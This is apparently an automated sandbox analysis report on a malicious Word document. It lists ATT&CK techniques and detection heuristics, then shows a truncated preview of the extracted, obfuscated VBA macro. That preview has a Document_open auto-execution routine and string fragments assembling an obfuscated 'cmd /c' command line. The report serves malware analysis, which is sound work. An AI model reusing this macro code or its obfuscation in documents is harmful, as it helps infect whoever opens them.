Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The critical-severity heuristic indicates a Shell() call within the VBA code, and the high-severity heuristic confirms that the call sits inside an auto-execution routine (Document_Open). This suggests the macro is designed to execute arbitrary commands, most likely to download and run a second-stage payload. No specific family could be identified from the obfuscated script.
Heuristics (5)
- VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58613 bytes |
SHA-256 (macros.bas): 20b1738deb4710b7199138b5596e665607b8702bd789b7987bd5aa74063ef0da
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "jMRWlkQk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KBiXKbCDdP()
qCDAz = JWXsj * IOJRRI / coaAc - vBjuvZ / 8889 + 54069 - (LcPotO / pDSfD * 87776 * RqDjsz / (PBbNE / abcSb / JChBd / 27735))
UqqZo = IccaYs * Zfwll / lKYGSw - NMDAE / 8330 + 75245 - (cwFIE / ICGqt * 67141 * ijGUYB / (HwkXb / SwZbWU / Lwjrd / 63756))
HRPZPa = czjfDm * jMijY / LdfUZd - mzPrr / 10958 + 43804 - (iUzMFn / bvqQS * 10281 * XJwIN / (dlvAl / sdioo / QGBrkU / 36315))
nkBIJc = RiTCAl * aTnUW / jQRUij - dbnjii / 46636 + 9230 - (VIboT / hsXbm * 8430 * YSzal / (WThZd / TqujTV / AUwit / 65355))
trMJr = jkOQrL * ROrcq / OHrMt - zIUZo / 11274 + 60519 - (OQokHC / oAAKp * 37617 * BKCQNz / (GCiTp / VMLaKM / CAaHVo / 89223))
iZzHu = MCUkHt * hmoiw / AfmID - ZDwan / 11185 + 86464 - (uotkSi / HoawMb * 87486 * hKvub / (fwQtB / lPbhi / SZttE / 31546))
KESlA = jYqhHW * HHiKa / JGSNvU - fQlbW / 65486 + 89203 - (zQqEGm / UfcuLE * 6868 * TtDft / (rqWRl / QnPLZ / XJqsFT / 94634))
zXhwjB = SErtM * hvaobp / cNazE - kjjoa / 34101 + 9112 - (SsTid / qHWkZ * 30308 * bGHNB / (fzmwi / hRfjQR / HIPCGJ / 95256))
End Function
Function QUSqiajvBTIqz()
bFAPFT = zmTqk * AGTIw / JIGaFv - tKcrP / 93270 + 99670 - (wlssV / WXAun * 83916 * GufKh / (UZViuT / ZBWuDu / GEVaPd / 49617))
awzqVF = Ktbjwu * USAmd / fQOlq - TcpQO / 5149 + 2824 - (jBiaI / tRwhZl * 48013 * RRdWOA / (JkLzP / FUcNiz / nSkZiC / 55195))
GrldwS = Hzjdv * jfzLiF / VNUul - rTYbwP / 31399 + 26756 - (YzMQZ / rftpkY * 74579 * MbKvZ / (tXqsIa / iWmOic / GBwSf / 55726))
hLEhk = YnroA * XQWat / nzVUvo - uwjEsL / 46635 + 88505 - (CzvhBv / pVpwNQ * 3872 * zkOoQ / (NQQiqM / izccSf / WfLms / 1652))
ArWVjZ = XLhHh * VfGiv / AVtjWq - vbvjo / 97390 + 51511 - (CcUwR / IzGJX * 85757 * ZWNZuX / (YHHAfR / fbbsIG / TDlkdJ / 83161))
FfREEn = zhiLf * aGzYds / AGrtH - BZEuD / 21179 + 64883 - (PwcPnm / ZMViFU * 57612 * crAhS / (zoYzCm / sniAzz / HVIpG / 66249))
End Function
Private Sub Document_open()
On Error Resume Next
oBDmW = IbFGdA / JYArt + 47943 * RzshO / 14765 * 23521
WYOhb = XGmwj / sJtwMW + 37319 * hJhcIY / 1872 * 82027
iAqEj = jrwzM / wNLXj + 60144 * IVrnK / 80194 * 8188
zIosWj = uRvHjw / WnJMf + 6447 * mvXfdO / 41398 * 19226
CwcDrDiwQl = Application.Run("zISYiMjnoYtF", "" + iYXUaiiYs + kkzIQMw + CVar("c") + TkGbNqmZCEjsFj + UoTNizaubY + EtiMSq + htWmjhCvdF + AzIFZLMHp + EWUpiP + TVzvjLB + AVYcs + fCCuCVhP + BvBipVfDTR + zFCIF + OXbVO + BUJkftih + nuGYYC + dNSQkXijHI + ShOdEa + KdFhJFfA + wlcLYM + TclIJGdKLT + hIqstDaZuLT + olaUBZjV + iptrvKMt + MVjJiEwucz + AiulwzBo + bLEvQrBTOv + ibVjlXQC + Ynncw + qwUWzrArr + ipfNWsERn + sIZtPoVWkHEYh + dbmkOtufN)
MtUak = vSrnf / YUqISq + 65236 * pwMlu / 44254 * 52636
zdLjwc = CKXwdP / dwwOQX + 71861 * ofqbPj / 67013 * 62260
End Sub
Function XtKTwZsO()
TjtaF = nvILNJ / ojpWM + 92200 * dKUSr / 95853 * 36303
HQIsSn = dCTkr / BzYsF + 2110 * dazrv / 73271 * 85126
pYJfT = wzAKw / lETzOX + 41132 * GDfSmi / 17980 * 28512
oLhWRD = msmjuk / BCPhi + 37206 * lENGG / 63477 * 37343
juMkNH = UEwTl / TUasF + 91360 * jEOXfD / 15019 * 38015
End Function
Attribute VB_Name = "MVvFlhzHuA"
Function EtiMSq()
On Error Resume Next
riiJUt = 23864 * vCGNq / (30998 + qdGnqF / wqOkPm - PKkOG + PKrVJM / bbIom)
wimpC = 4625 / IiJAtm - QFUmo * njbPIB * 77022 / 65052 - (18121 * zwqYKm - 92765 * umzIVH)
oQuiXY = 17110 / oukiZF - sVzjXL * mkddmG * 41387 / 66288 - (50343 * pnRzQG - 82374 * jdWwlf)
baLjzjjJ = CStr(Chr(RDlTdOZvlRsN + MCBDszMC + 109 + UpJYJuYsN + kDEQqKGzB)) + "d /" + CStr(Chr(PdzoMqn + PLVznFAmrs + 99 + nsczzmB + FqmTajaU)) + " " + "^fO^r" + " , , "
hNQcwq = 1677 / QGWjB - GzoJC * NrdJj * 84921 / 3540 - (74695 * KUKLGG - 38847 * NBHqwt)
EtYtJ = 63278 / DtipkH - GoOuFl * VvHlG * 52265 / 15563 - (90326 * Owzjf - 97635 * tVdWGR)
KJaiWMmSjh = " /^F" + " ; "
... (truncated)